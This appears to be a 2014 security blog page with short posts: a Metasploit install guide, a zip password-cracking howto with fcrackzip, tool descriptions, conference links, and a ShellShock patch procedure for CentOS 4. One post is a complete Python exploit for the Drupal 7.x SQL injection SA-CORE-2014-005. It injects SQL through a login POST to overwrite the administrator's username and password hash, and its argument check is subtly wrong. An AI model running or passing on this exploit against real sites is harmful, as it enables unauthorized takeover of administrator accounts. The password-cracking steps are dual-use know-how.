CVE Feeds

Oct 31, 2014

Howto: Install Metasploit (GIT) on Ubuntu 14.04.2

1. Update repository and your OS
# apt-get update && apt-get dist-upgrade -y

2. Download source code from git
# git clone https://github.com/rapid7/metasploit-framework

3. Install required application
# apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby ruby-dev

4. Install bundler
# gem install bundler

5. Install required gem
# bundle install

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 30, 2014

Howto: Zip and crack zip file in Kali

1. Create zip file
# zip --password <your_password>  filename.zip target_file



2. Crack zip file with fcrackzip
# fcrackzip -h

fcrackzip version 1.0, a fast/free zip password cracker
written by Marc Lehmann <pcg@goof.com> You can find more info on
http://www.goof.com/pcg/marc/

USAGE: fcrackzip
          [-b|--brute-force]            use brute force algorithm
          [-D|--dictionary]             use a dictionary
          [-B|--benchmark]              execute a small benchmark
          [-c|--charset characterset]   use characters from charset
          [-h|--help]                   show this message
          [--version]                   show the version of this program
          [-V|--validate]               sanity-check the algortihm
          [-v|--verbose]                be more verbose
          [-p|--init-password string]   use string as initial password/file
          [-l|--length min-max]         check password with length min to max
          [-u|--use-unzip]              use unzip to weed out wrong passwords
          [-m|--method num]             use method number "num" (see below)
          [-2|--modulo r/m]             only calculcate 1/m of the password
          file...                    the zipfiles to crack

methods compiled in (* = default):

 0: cpmask
 1: zip1
*2: zip2, USE_MULT_TAB


3. Crack it with
# fcrackzip -b -c 'a' -l 1-5 -u filename.zip

4. Done.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 23, 2014

Video: BSides DC 2014


BSides DC 2014 

 


Source:: https://www.youtube.com/playlist?list=PLWeT8XI0Y0X7MI_Q-nbG4JUKIGmvLhd3l

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 21, 2014

Tools: Findbugs + FindSecurityBugs - Java security static analysis tool

FindBugs

a program which uses static analysis to look for bugs in Java code.  It is free software, distributed under the terms of the Lesser GNU Public License. The name FindBugs™ and the FindBugs logo are trademarked by The University of Maryland. FindBugs has been downloaded more than a million times. 

Source:: http://findbugs.sourceforge.net/

FindSecurityBugs
For those who don't know about it, FindSecurityBugs is a plugin for the Java static analysis tool FindBugs. This plugin consist of a set rules that focus only on security weakness.

Source: http://blog.h3xstream.com/2014/10/find-security-bugs-new-version-and.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: RIPS (Static Source Code Analysis For PHP Vulnerabilities)

RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.  

Source: http://rips-scanner.sourceforge.net/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OWASP OWTF(Offensive Web Testing Framework)

OWASP OWTF is a project that aims to make security assessments as efficient as possible by automating the manual, uncreative part of pen testing


Source:: https://owtf.github.io/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 16, 2014

Ruxcon & Breakpoint - Material

https://ruxcon.org.au/slides/

https://ruxconbreakpoint.com/slides/

 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 3:
        print "host username password"
        print "http://nope.io admin wowsecure"
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +hash[:55] \
                +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
            print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
 
 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hack In The Box 2014 - Material

http://conference.hitb.org/hitbsecconf2014kul/materials/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from http://bradthemad.org/tech/notes/patching_rpms.php.
Then run the following commands from your %_topdir:
wget http://ftp.redhat.com/redhat/linux/updates/enterprise/4ES/en/os/SRPMS/bash-3.0-27.el4.src.rpm
rpm -ivh bash-3.0-27.el4.src.rpm
cd SOURCES
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-017
cd ..
Patch SPECS/bash.spec with this diff:
4c4
< Release: 27%{?dist}
---
> Release: 27.2%{?dist}
28a29
> Patch17: bash30-017
110c111,112
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
Then finish with these commands:
rpmbuild -ba SPECS/bash.spec
sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from gnu.org, so also download those into the same SOURCES directory:
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-018
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
4c4
< Release: 27%{?dist}
---
> Release: 27.2.019%{?dist}
28a29,31
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
110c113,116
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 
 
Source:  http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |